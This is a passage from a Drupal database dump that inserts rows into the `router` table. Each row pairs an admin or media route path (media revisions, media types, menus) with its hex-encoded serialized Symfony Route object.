613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a353a226d65646961223b693a313b733a31343a226d656469615f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37343a227b5e2f6d656469612f283f503c6d656469613e5b5e2f5d2b2b292f7265766973696f6e2f283f503c6d656469615f7265766973696f6e3e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a226d656469615f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a226d65646961223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6d65646961223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a353a226d65646961223b693a313b733a31343a226d656469615f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32313b733a31343a227061747465726e4f75746c696e65223b733a32363a222f6d656469612f252f7265766973696f6e2f252f64656c657465223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.media.revision_revert_form', '/media/{media}/revision/{media_revision}/revert', '/media/%/revision/%/revert', 21, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34373a222f6d656469612f7b6d656469617d2f7265766973696f6e2f7b6d656469615f7265766973696f6e7d2f726576657274223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32313a226d656469612e7265766973696f6e2d726576657274223b733a363a225f7469746c65223b733a31353a22526576657274207265766973696f6e223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32313a226d656469615f7265766973696f6e2e726576657274223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a323a7b733a353a226d65646961223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a6d65646961223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d733a31343a226d656469615f7265766973696f6e223b613a323a7b733a343a2274797065223b733a32313a22656e746974795f7265766973696f6e3a6d65646961223b733a393a22636f6e766572746572223b733a33303a22706172616d636f6e7665727465722e656e746974795f7265766973696f6e223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a323a7b693a303b733a353a226d65646961223b693a313b733a31343a226d656469615f7265766973696f6e223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37343a227b5e2f6d656469612f283f503c6d656469613e5b5e2f5d2b2b292f7265766973696f6e2f283f503c6d656469615f7265766973696f6e3e5b5e2f5d2b2b292f726576657274247d734475223b733a31313a22706174685f746f6b656e73223b613a353a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f726576657274223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31343a226d656469615f7265766973696f6e223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a393a222f7265766973696f6e223b7d693a333b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a226d65646961223b693a343b623a313b7d693a343b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6d65646961223b7d7d733a393a22706174685f76617273223b613a323a7b693a303b733a353a226d65646961223b693a313b733a31343a226d656469615f7265766973696f6e223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a32313b733a31343a227061747465726e4f75746c696e65223b733a32363a222f6d656469612f252f7265766973696f6e2f252f726576657274223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.media.version_history', '/media/{media}/revisions', '/media/%/revisions', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32343a222f6d656469612f7b6d656469617d2f7265766973696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35343a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c56657273696f6e486973746f7279436f6e74726f6c6c6572223b733a363a225f7469746c65223b733a393a225265766973696f6e73223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32343a226d656469612e7669657720616c6c207265766973696f6e73223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a31323a225f61646d696e5f726f757465223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a353a226d65646961223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a6d65646961223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a226d65646961223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34313a227b5e2f6d656469612f283f503c6d656469613e5b5e2f5d2b2b292f7265766973696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7265766973696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a353a226d65646961223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6d65646961223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a226d65646961223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31383a222f6d656469612f252f7265766973696f6e73223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.media_type.add_form', '/admin/structure/media/add', '/admin/structure/media/add', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32363a222f61646d696e2f7374727563747572652f6d656469612f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31323a225f656e746974795f666f726d223b733a31343a226d656469615f747970652e616464223b733a31343a22656e746974795f747970655f6964223b733a31303a226d656469615f74797065223b733a31353a225f7469746c655f63616c6c6261636b223b733a35363a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a6164645469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31303a226d656469615f74797065223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f61646d696e2f7374727563747572652f6d656469612f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32363a222f61646d696e2f7374727563747572652f6d656469612f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32363a222f61646d696e2f7374727563747572652f6d656469612f616464223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.media_type.collection', '/admin/structure/media', '/admin/structure/media', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f7374727563747572652f6d65646961223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f6c697374223b733a31303a226d656469615f74797065223b733a363a225f7469746c65223b733a31313a224d65646961207479706573223b733a31363a225f7469746c655f617267756d656e7473223b613a303a7b7d733a31343a225f7469746c655f636f6e74657874223b733a303a22223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572206d65646961207479706573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f7374727563747572652f6d65646961247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f7374727563747572652f6d65646961223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f7374727563747572652f6d65646961223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.media_type.config_translation_overview', '/admin/structure/media/manage/{media_type}/translate', '/admin/structure/media/manage/%/translate', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35323a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31303a226d656469615f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36393a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a363b7d7d, 6);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.media_type.delete_form', '/admin/structure/media/manage/{media_type}/delete', '/admin/structure/media/manage/%/delete', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34393a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a226d656469615f747970652e64656c657465223b733a31353a225f7469746c655f63616c6c6261636b223b733a36303a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a64656c6574655469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31373a226d656469615f747970652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36363a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.media_type.edit_form', '/admin/structure/media/manage/{media_type}', '/admin/structure/media/manage/%', 30, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a34323a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31353a226d656469615f747970652e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35383a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a656469745469746c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31373a226d656469615f747970652e757064617465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a323a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35393a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a33303b733a31343a227061747465726e4f75746c696e65223b733a33313a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f25223b733a383a226e756d5061727473223b693a353b7d7d, 5),
('entity.media_type.entity_permissions_form', '/admin/structure/media/manage/{media_type}/permissions', '/admin/structure/media/manage/%/permissions', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35343a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f7b6d656469615f747970657d2f7065726d697373696f6e73223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a363a225f7469746c65223b733a31383a224d616e616765207065726d697373696f6e73223b733a353a225f666f726d223b733a33383a2244727570616c5c757365725c466f726d5c456e746974795065726d697373696f6e73466f726d223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a31383a2262756e646c655f656e746974795f74797065223b733a31303a226d656469615f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32323a2261646d696e6973746572207065726d697373696f6e73223b7d733a373a226f7074696f6e73223b613a363a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a393a225f6669656c645f7569223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a333a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a32313a22776974685f636f6e6669675f6f7665727269646573223b623a313b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f283f503c6d656469615f747970653e5b5e2f5d2b2b292f7065726d697373696f6e73247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31323a222f7065726d697373696f6e73223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32393a222f61646d696e2f7374727563747572652f6d656469612f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a34333a222f61646d696e2f7374727563747572652f6d656469612f6d616e6167652f252f7065726d697373696f6e73223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.menu.add_form', '/admin/structure/menu/add', '/admin/structure/menu/add', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f7374727563747572652f6d656e752f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a383a226d656e752e616464223b733a363a225f7469746c65223b733a383a22416464206d656e75223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a343a226d656e75223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f7374727563747572652f6d656e752f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f7374727563747572652f6d656e752f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f7374727563747572652f6d656e752f616464223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.menu.add_link_form', '/admin/structure/menu/manage/{menu}/add', '/admin/structure/menu/manage/%/add', 61, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33393a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f7b6d656e757d2f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36303a225c44727570616c5c6d656e755f6c696e6b5f636f6e74656e745c436f6e74726f6c6c65725c4d656e75436f6e74726f6c6c65723a3a6164644c696e6b223b733a363a225f7469746c65223b733a31333a22416464206d656e75206c696e6b223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31373a226d656e755f6c696e6b5f636f6e74656e74223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a343a226d656e75223b613a323a7b733a343a2274797065223b733a31313a22656e746974793a6d656e75223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a35363a227b5e2f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f283f503c6d656e753e5b5e2f5d2b2b292f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a343a222f616464223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d656e75223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f7374727563747572652f6d656e752f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226d656e75223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36313b733a31343a227061747465726e4f75746c696e65223b733a33343a222f61646d696e2f7374727563747572652f6d656e752f6d616e6167652f252f616464223b733a383a226e756d5061727473223b693a363b7d7d, 6),
